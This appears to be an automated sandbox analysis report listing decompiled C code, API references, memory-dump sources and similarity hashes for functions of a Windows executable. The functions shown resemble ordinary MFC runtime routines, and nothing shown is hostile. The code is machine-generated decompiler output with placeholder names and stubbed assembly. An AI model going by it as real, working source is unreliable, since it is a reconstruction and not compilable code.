                                                                                                                            0x0040ff60
                                                                                                                            0x0040ff65
                                                                                                                            0x0040ff66
                                                                                                                            0x0040ff6b
                                                                                                                            0x0040ff6c
                                                                                                                            0x00000000
                                                                                                                            0x0040ff02
                                                                                                                            0x0040ff02
                                                                                                                            0x0040ff05
                                                                                                                            0x0040ff05
                                                                                                                            0x0040ff13
                                                                                                                            0x0040ff17
                                                                                                                            0x0040ff19
                                                                                                                            0x0040ff1e
                                                                                                                            0x0040ff20
                                                                                                                            0x0040ff27
                                                                                                                            0x0040ff2e
                                                                                                                            0x0040ff35
                                                                                                                            0x0040ff3a
                                                                                                                            0x0040ff3b
                                                                                                                            0x0040ff40
                                                                                                                            0x0040ff27
                                                                                                                            0x0040ff1e
                                                                                                                            0x0040ff41
                                                                                                                            0x0040ff44
                                                                                                                            0x00000000
                                                                                                                            0x0040ff05

                                                                                                                            APIs
                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0040FEE1
                                                                                                                            • GetModuleHandleA.KERNEL32(?,00437BCC,00000000,?), ref: 0040FFAC
                                                                                                                            • GetProcAddress.KERNEL32(00000000,MFCM80ReleaseManagedReferences), ref: 0040FFBC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressH_prolog3_HandleModuleProc
                                                                                                                            • String ID: MFCM80ReleaseManagedReferences$mfcm80.dll
                                                                                                                            • API String ID: 2418878492-2500072749
                                                                                                                            • Opcode ID: 45313eeaf7b853c0263e37f0779a3a64aba1c0fc997e258b9034cc7956344f3d
                                                                                                                            • Instruction ID: 3b5b09e12d0fe70f09d490b95a1d6e37004d0cfbf290ae69df87c5fc64a4dfe7
                                                                                                                            • Opcode Fuzzy Hash: 45313eeaf7b853c0263e37f0779a3a64aba1c0fc997e258b9034cc7956344f3d
                                                                                                                            • Instruction Fuzzy Hash: 23315E31A002159BCB25EFA1C895BEE77A5AF49304F0400BFE805BB2D2DB7D9E45CB59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00418434 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 82%
                                                                                                                            			E00418434(void* __edx, void* __edi, void* __eflags, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				signed int _t39;
				void* _t47;
				intOrPtr* _t48;
				void* _t50;
				void* _t51;
				void* _t63;
				void* _t64;
				intOrPtr _t65;
				void* _t67;
				void* _t69;

				_t64 = __edi;
				_t63 = __edx;
				_t51 = E004070A0(_t50, __edi, _t67, __eflags);
				_t29 =  *((intOrPtr*)(_t51 + 0x10));
				if(_t29 == 0) {
					L19:
					return 0 |  *((intOrPtr*)(_t51 + 0x10)) != 0x00000000;
				}
				_t32 = _t29 - 1;
				 *((intOrPtr*)(_t51 + 0x10)) = _t32;
				if(_t32 != 0) {
					goto L19;
				}
				if(_a4 == 0) {
					L8:
					_push(_t64);
					_t65 =  *((intOrPtr*)(E0040706D(_t51, _t64, 0, _t76) + 4));
					_t69 = E0040E2BB(0x442940);
					if(_t69 == 0 || _t65 == 0) {
						L18:
						goto L19;
					} else {
						_t35 =  *((intOrPtr*)(_t69 + 0xc));
						_t79 = _t35;
						if(_t35 == 0) {
							L12:
							if( *((intOrPtr*)(_t65 + 0x98)) != 0) {
								_t36 =  *((intOrPtr*)(_t69 + 0xc));
								_a4 = _a4 & 0x00000000;
								_t82 = _t36;
								if(_t36 != 0) {
									_push(_t36);
									_t39 = E00420EF4(_t51, _t63, _t65, _t69, _t82);
									_push( *((intOrPtr*)(_t69 + 0xc)));
									_a4 = _t39;
									E0041D8F1(_t51, _t63, _t65, _t69, _t82);
								}
								_t37 = E0041DB2B(_t51, _t63, _t65, _t69,  *((intOrPtr*)(_t65 + 0x98)));
								 *((intOrPtr*)(_t69 + 0xc)) = _t37;
								if(_t37 == 0 && _a4 != _t37) {
									 *((intOrPtr*)(_t69 + 0xc)) = E0041DB2B(_t51, _t63, _t65, _t69, _a4);
								}
							}
							goto L18;
						}
						_push(_t35);
						if(E00420EF4(_t51, _t63, _t65, _t69, _t79) >=  *((intOrPtr*)(_t65 + 0x98))) {
							goto L18;
						}
						goto L12;
					}
				}
				if(_a4 != 0xffffffff) {
					_t47 = E0040580C();
					if(_t47 != 0) {
						_t48 =  *((intOrPtr*)(_t47 + 0x3c));
						_t76 = _t48;
						if(_t48 != 0) {
							 *_t48(0, 0);
						}
					}
				}
				E00418368( *((intOrPtr*)(_t51 + 0x20)), _t64);
				E00418368( *((intOrPtr*)(_t51 + 0x1c)), _t64);
				E00418368( *((intOrPtr*)(_t51 + 0x18)), _t64);
				E00418368( *((intOrPtr*)(_t51 + 0x14)), _t64);
				E00418368( *((intOrPtr*)(_t51 + 0x24)), _t64);
				goto L8;
			}





















                                                                                                                            0x00418434
                                                                                                                            0x00418434
                                                                                                                            0x0041843e
                                                                                                                            0x00418440
                                                                                                                            0x00418447
                                                                                                                            0x0041851f
                                                                                                                            0x0041852a
                                                                                                                            0x0041852a
                                                                                                                            0x0041844d
                                                                                                                            0x00418450
                                                                                                                            0x00418453
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041845c
                                                                                                                            0x004184a0
                                                                                                                            0x004184a0
                                                                                                                            0x004184a6
                                                                                                                            0x004184b3
                                                                                                                            0x004184b7
                                                                                                                            0x0041851e
                                                                                                                            0x00000000
                                                                                                                            0x004184bd
                                                                                                                            0x004184bd
                                                                                                                            0x004184c0
                                                                                                                            0x004184c2
                                                                                                                            0x004184d3
                                                                                                                            0x004184da
                                                                                                                            0x004184dc
                                                                                                                            0x004184df
                                                                                                                            0x004184e3
                                                                                                                            0x004184e5
                                                                                                                            0x004184e7
                                                                                                                            0x004184e8
                                                                                                                            0x004184ed
                                                                                                                            0x004184f0
                                                                                                                            0x004184f3
                                                                                                                            0x004184f9
                                                                                                                            0x00418500
                                                                                                                            0x00418508
                                                                                                                            0x0041850b
                                                                                                                            0x0041851b
                                                                                                                            0x0041851b
                                                                                                                            0x0041850b
                                                                                                                            0x00000000
                                                                                                                            0x004184da
                                                                                                                            0x004184c4
                                                                                                                            0x004184d1
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004184d1
                                                                                                                            0x004184b7
                                                                                                                            0x00418462
                                                                                                                            0x00418464
                                                                                                                            0x0041846b
                                                                                                                            0x0041846d
                                                                                                                            0x00418470
                                                                                                                            0x00418472
                                                                                                                            0x00418476
                                                                                                                            0x00418476
                                                                                                                            0x00418472
                                                                                                                            0x0041846b
                                                                                                                            0x0041847b
                                                                                                                            0x00418483
                                                                                                                            0x0041848b
                                                                                                                            0x00418493
                                                                                                                            0x0041849b
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __msize_malloc
                                                                                                                            • String ID: @)D
                                                                                                                            • API String ID: 1288803200-3123465904
                                                                                                                            • Opcode ID: 11e22b187c43aa253194a58d255ede5ae506e0fbbccafbf8d65448490cf7a2ef
                                                                                                                            • Instruction ID: f66670b3c2e85408f8802c20a54d8855e0651b18164964ba86f454a092648f3a
                                                                                                                            • Opcode Fuzzy Hash: 11e22b187c43aa253194a58d255ede5ae506e0fbbccafbf8d65448490cf7a2ef
                                                                                                                            • Instruction Fuzzy Hash: 3C218071600615AFCB24AF35C881A9F7795FF04728B14852FE8199B296EF38EDD0C798
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041321C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 75%
                                                                                                                            			E0041321C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				int _t44;
				signed int _t46;
				signed int _t52;
				void* _t58;
				intOrPtr* _t60;
				signed int _t61;
				void* _t62;
				void* _t63;

				_t63 = __eflags;
				_t56 = __edx;
				_push(0x30);
				E0041E981(E00431AA0, __ebx, __edi, __esi);
				_t52 = 0;
				 *((intOrPtr*)(_t62 - 0x18)) = 0;
				 *((intOrPtr*)(_t62 - 0x1c)) = 0x435168;
				_t60 =  *((intOrPtr*)(_t62 + 8));
				 *(_t62 - 4) = 0;
				E004070B9(_t62 - 0x14, _t63,  *((intOrPtr*)(_t60 - 0xb0)));
				 *(_t62 - 4) = 1;
				if( *((intOrPtr*)(_t62 + 0xc)) != 0) {
					_push( *((intOrPtr*)(_t62 + 0xc)));
					_t58 = E00407A85(0, __edx, __edi, _t60, __eflags);
					GetRgnBox( *(_t58 + 4), _t62 - 0x2c);
					IntersectRect(_t62 - 0x3c, _t62 - 0x2c, _t60 - 0x9c);
					_t44 = EqualRect(_t62 - 0x3c, _t62 - 0x2c);
					__eflags = _t44;
					_push( *((intOrPtr*)(_t62 + 0x10)));
					if(_t44 == 0) {
						L2:
						_t46 =  *((intOrPtr*)( *_t60 + 0x64))(_t60, _t52);
						 *(_t62 - 4) = _t52;
						_t61 = _t46;
						if( *(_t62 - 0x10) != _t52) {
							_push( *((intOrPtr*)(_t62 - 0x14)));
							_push(_t52);
							_t46 = E00406890();
						}
						_t52 = _t61;
						L5:
						 *(_t62 - 4) =  *(_t62 - 4) | 0xffffffff;
						_t16 = _t62 - 0x1c; // 0x435168
						 *((intOrPtr*)(_t62 - 0x1c)) = 0x434040;
						E00407AE6(_t46, _t16);
						return E0041EA59(_t52);
					}
					_push(_t58);
					_t46 = E00411DE4(_t56);
					__eflags =  *(_t62 - 0x10);
					 *(_t62 - 4) = 0;
					if( *(_t62 - 0x10) != 0) {
						_push( *((intOrPtr*)(_t62 - 0x14)));
						_push(0);
						_t46 = E00406890();
					}
					goto L5;
				}
				_push( *((intOrPtr*)(_t62 + 0x10)));
				goto L2;
			}











                                                                                                                            0x0041321c
                                                                                                                            0x0041321c
                                                                                                                            0x0041321c
                                                                                                                            0x00413223
                                                                                                                            0x00413228
                                                                                                                            0x0041322a
                                                                                                                            0x0041322d
                                                                                                                            0x00413234
                                                                                                                            0x00413240
                                                                                                                            0x00413243
                                                                                                                            0x0041324b
                                                                                                                            0x0041324f
                                                                                                                            0x0041328d
                                                                                                                            0x00413295
                                                                                                                            0x0041329e
                                                                                                                            0x004132b3
                                                                                                                            0x004132c1
                                                                                                                            0x004132c7
                                                                                                                            0x004132c9
                                                                                                                            0x004132cc
                                                                                                                            0x00413254
                                                                                                                            0x00413258
                                                                                                                            0x0041325e
                                                                                                                            0x00413261
                                                                                                                            0x00413263
                                                                                                                            0x00413265
                                                                                                                            0x00413268
                                                                                                                            0x00413269
                                                                                                                            0x00413269
                                                                                                                            0x0041326e
                                                                                                                            0x00413270
                                                                                                                            0x00413270
                                                                                                                            0x00413274
                                                                                                                            0x00413277
                                                                                                                            0x0041327e
                                                                                                                            0x0041328a
                                                                                                                            0x0041328a
                                                                                                                            0x004132d7
                                                                                                                            0x004132d8
                                                                                                                            0x004132dd
                                                                                                                            0x004132e0
                                                                                                                            0x004132e3
                                                                                                                            0x004132e5
                                                                                                                            0x004132e8
                                                                                                                            0x004132e9
                                                                                                                            0x004132e9
                                                                                                                            0x00000000
                                                                                                                            0x004132e3
                                                                                                                            0x00413251
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Rect$EqualH_prolog3Intersect
                                                                                                                            • String ID: hQC
                                                                                                                            • API String ID: 2161412305-4126162869
                                                                                                                            • Opcode ID: cc11c30cc87cdcf521e453d6c082a9791a88918998bf39397234505f38255392
                                                                                                                            • Instruction ID: ce2401ad36fd943d4f6305c5f39f30188be0b4b214b6310dfdf921d3c7a57df4
                                                                                                                            • Opcode Fuzzy Hash: cc11c30cc87cdcf521e453d6c082a9791a88918998bf39397234505f38255392
                                                                                                                            • Instruction Fuzzy Hash: 04210C71D00209EBCF01EFA5C9809DEBBB8BF08305F10856AE515A3151C7389B55DF65
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00407E14 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 79%
                                                                                                                            			E00407E14(void* __edi, struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
				void _v20;
				int _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;

				if(E00407C68() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						_t14 = 0;
						L10:
						return _t14;
					}
					_t23 = _a8;
					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t23 + 4)) = 0;
						 *((intOrPtr*)(_t23 + 8)) = 0;
						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t23 + 0x10) = _t18;
						 *((intOrPtr*)(_t23 + 0x24)) = 1;
						if( *_t23 >= 0x48) {
							E004208BB(_t25, _t23 + 0x28, 0x20, "DISPLAY", 0x1f);
						}
						_t14 = 1;
						goto L10;
					}
				}
				return GetMonitorInfoA(_a4, _a8);
			}








                                                                                                                            0x00407e21
                                                                                                                            0x00407e3a
                                                                                                                            0x00407ea5
                                                                                                                            0x00407ea5
                                                                                                                            0x00407ea7
                                                                                                                            0x00000000
                                                                                                                            0x00407ea8
                                                                                                                            0x00407e3c
                                                                                                                            0x00407e43
                                                                                                                            0x00000000
                                                                                                                            0x00407e5c
                                                                                                                            0x00407e5d
                                                                                                                            0x00407e60
                                                                                                                            0x00407e6e
                                                                                                                            0x00407e71
                                                                                                                            0x00407e79
                                                                                                                            0x00407e7a
                                                                                                                            0x00407e7b
                                                                                                                            0x00407e7c
                                                                                                                            0x00407e83
                                                                                                                            0x00407e86
                                                                                                                            0x00407e8a
                                                                                                                            0x00407e99
                                                                                                                            0x00407e9e
                                                                                                                            0x00407ea1
                                                                                                                            0x00000000
                                                                                                                            0x00407ea1
                                                                                                                            0x00407e43
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • GetMonitorInfoA.USER32(00000002,00000000), ref: 00407E29
                                                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 00407E52
                                                                                                                            • GetSystemMetrics.USER32 ref: 00407E6A
                                                                                                                            • GetSystemMetrics.USER32 ref: 00407E71
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: System$InfoMetrics$MonitorParameters
                                                                                                                            • String ID: DISPLAY
                                                                                                                            • API String ID: 1842416757-865373369
                                                                                                                            • Opcode ID: 28059d74f833cbd88867bc60bf3b0286a2f6f11d23ba9f6da06d1780d3ef6bcc
                                                                                                                            • Instruction ID: ab46eb1943452c8c299e2398f8d60b6e8b4a8e44e537b704b5de8a07217a0e5e
                                                                                                                            • Opcode Fuzzy Hash: 28059d74f833cbd88867bc60bf3b0286a2f6f11d23ba9f6da06d1780d3ef6bcc
                                                                                                                            • Instruction Fuzzy Hash: 66119471A05324ABDF119F64DC8469BBBA8EF05740B0080B6FD05BA186D7B9FD10CBD6
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404938 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00404938(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__** _a4) {
				void* __edi;
				struct HWND__* _t10;
				struct HWND__* _t12;
				struct HWND__* _t14;
				struct HWND__* _t15;
				int _t19;
				void* _t21;
				void* _t25;
				struct HWND__** _t26;
				void* _t27;

				_t25 = __edx;
				_t21 = __ebx;
				_t26 = _a4;
				_t27 = __ecx;
				if(E004085FF(__ecx, __eflags, _t26) == 0) {
					_t10 = E0040AA69(__ecx);
					__eflags = _t10;
					if(_t10 == 0) {
						L5:
						__eflags = _t26[1] - 0x100;
						if(_t26[1] != 0x100) {
							L13:
							return E00408A42(_t26);
						}
						_t12 = _t26[2];
						__eflags = _t12 - 0x1b;
						if(_t12 == 0x1b) {
							L8:
							__eflags = GetWindowLongA( *_t26, 0xfffffff0) & 0x00000004;
							if(__eflags == 0) {
								goto L13;
							}
							_t14 = E0040E0BB(_t21, _t25, _t26, __eflags,  *_t26, "Edit");
							__eflags = _t14;
							if(_t14 == 0) {
								goto L13;
							}
							_t15 = GetDlgItem( *(_t27 + 0x20), 2);
							__eflags = _t15;
							if(_t15 == 0) {
								L12:
								SendMessageA( *(_t27 + 0x20), 0x111, 2, 0);
								goto L1;
							}
							_t19 = IsWindowEnabled(_t15);
							__eflags = _t19;
							if(_t19 == 0) {
								goto L13;
							}
							goto L12;
						}
						__eflags = _t12 - 3;
						if(_t12 != 3) {
							goto L13;
						}
						goto L8;
					}
					__eflags =  *(_t10 + 0x68);
					if( *(_t10 + 0x68) == 0) {
						goto L5;
					}
					return 0;
				}
				L1:
				return 1;
			}













                                                                                                                            0x00404938
                                                                                                                            0x00404938
                                                                                                                            0x0040493a
                                                                                                                            0x0040493f
                                                                                                                            0x00404948
                                                                                                                            0x00404951
                                                                                                                            0x00404956
                                                                                                                            0x00404958
                                                                                                                            0x00404964
                                                                                                                            0x00404964
                                                                                                                            0x0040496b
                                                                                                                            0x004049c6
                                                                                                                            0x00000000
                                                                                                                            0x004049c9
                                                                                                                            0x0040496d
                                                                                                                            0x00404970
                                                                                                                            0x00404973
                                                                                                                            0x0040497a
                                                                                                                            0x00404984
                                                                                                                            0x00404986
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040498f
                                                                                                                            0x00404994
                                                                                                                            0x00404996
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040499d
                                                                                                                            0x004049a3
                                                                                                                            0x004049a5
                                                                                                                            0x004049b2
                                                                                                                            0x004049be
                                                                                                                            0x00000000
                                                                                                                            0x004049be
                                                                                                                            0x004049a8
                                                                                                                            0x004049ae
                                                                                                                            0x004049b0
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004049b0
                                                                                                                            0x00404975
                                                                                                                            0x00404978
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00404978
                                                                                                                            0x0040495a
                                                                                                                            0x0040495e
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00404960
                                                                                                                            0x0040494a
                                                                                                                            0x00000000

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Edit
                                                                                                                            • API String ID: 0-554135844
                                                                                                                            • Opcode ID: c5ee1fd0fe80f7bdae38c693016da195f894b8689ec509ff3fcddd62094fed30
                                                                                                                            • Instruction ID: 5b8768ccdc88d0a98061964be6968252e8f283029954a17b0ac3f9277b54e272
                                                                                                                            • Opcode Fuzzy Hash: c5ee1fd0fe80f7bdae38c693016da195f894b8689ec509ff3fcddd62094fed30
                                                                                                                            • Instruction Fuzzy Hash: 5301A1F0310202AAEA315F358C09B2BB668AFD07A2F14453BB246F22E5DB78CC50C51D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00402480 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 37%
                                                                                                                            			E00402480(int _a4) {
				char _v8;
				short* _t8;
				void* _t13;
				int _t14;
				void* _t18;
				short* _t19;
				void* _t22;
				int _t23;
				char* _t26;

				_t26 = _a4;
				if(_t26 == 0) {
					return 0;
				} else {
					_t14 =  *0x4427d8(_t18, _t22, _t13);
					_a4 = 0;
					_t23 = MultiByteToWideChar(_t14, 0, _t26, 0xffffffff, 0, 0);
					_t3 = _t23 - 1; // -1
					_t8 = _t3;
					__imp__#4(0, _t8);
					_t19 = _t8;
					if(_t19 == 0 || MultiByteToWideChar(_t14, 0, _t26, 0xffffffff, _t19, _t23) == _t23) {
						return _t19;
					} else {
						__imp__#6(_t19);
						E004014A0( &_v8);
						return 0;
					}
				}
			}












                                                                                                                            0x00402481
                                                                                                                            0x00402487
                                                                                                                            0x004024f3
                                                                                                                            0x00402489
                                                                                                                            0x00402499
                                                                                                                            0x0040249e
                                                                                                                            0x004024ac
                                                                                                                            0x004024ae
                                                                                                                            0x004024ae
                                                                                                                            0x004024b4
                                                                                                                            0x004024ba
                                                                                                                            0x004024be
                                                                                                                            0x004024ef
                                                                                                                            0x004024d2
                                                                                                                            0x004024d3
                                                                                                                            0x004024dd
                                                                                                                            0x004024e8
                                                                                                                            0x004024e8
                                                                                                                            0x004024be

                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,00000000,?,004018A1), ref: 004024A6
                                                                                                                            • SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 004024B4
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,00000000,?,004018A1), ref: 004024C8
                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 004024D3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiStringWide$AllocFree
                                                                                                                            • String ID: 5C
                                                                                                                            • API String ID: 447844807-3824571658
                                                                                                                            • Opcode ID: 1fcf4334eabc9ee33cd78d90a7ae653b51c859f26993f791103761e0237fb2bb
                                                                                                                            • Instruction ID: 245694e1a40d7a89bae06de621825f7b469ba4271f8f045e528cef88a2b0b5c6
                                                                                                                            • Opcode Fuzzy Hash: 1fcf4334eabc9ee33cd78d90a7ae653b51c859f26993f791103761e0237fb2bb
                                                                                                                            • Instruction Fuzzy Hash: D501A9363482157BE2205B65BC48F6BB79CD7C1B7AF144276F51CE11D0DA75A8044668
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040A905 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 35COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 92%
                                                                                                                            			E0040A905(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t15;
				intOrPtr* _t23;
				void* _t25;
				intOrPtr _t28;
				void* _t29;

				_push(4);
				E0041E981(E0043147A, __ebx, __edi, __esi);
				_t28 = __ecx;
				 *((intOrPtr*)(_t29 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x4345e4;
				 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
				if( *((intOrPtr*)(__ecx + 0x20)) != 0 && __ecx != 0x4442b0 && __ecx != 0x444308 && __ecx != 0x444360 && __ecx != 0x4443b8) {
					E0040A3BB(__ebx, __ecx, _t25, __edi, __ecx);
				}
				_t23 =  *((intOrPtr*)(_t28 + 0x4c));
				if(_t23 != 0) {
					 *((intOrPtr*)( *_t23 + 4))(1);
				}
				_t15 =  *((intOrPtr*)(_t28 + 0x50));
				if(_t15 != 0 &&  *(_t15 + 0x28) == _t28) {
					 *(_t15 + 0x28) =  *(_t15 + 0x28) & 0x00000000;
				}
				 *(_t29 - 4) =  *(_t29 - 4) | 0xffffffff;
				return E0041EA59(E004054FB(_t28));
			}








                                                                                                                            0x0040a905
                                                                                                                            0x0040a90c
                                                                                                                            0x0040a911
                                                                                                                            0x0040a913
                                                                                                                            0x0040a916
                                                                                                                            0x0040a91c
                                                                                                                            0x0040a924
                                                                                                                            0x0040a946
                                                                                                                            0x0040a946
                                                                                                                            0x0040a94b
                                                                                                                            0x0040a950
                                                                                                                            0x0040a956
                                                                                                                            0x0040a956
                                                                                                                            0x0040a959
                                                                                                                            0x0040a95e
                                                                                                                            0x0040a965
                                                                                                                            0x0040a965
                                                                                                                            0x0040a969
                                                                                                                            0x0040a979

                                                                                                                            APIs
                                                                                                                            Strings
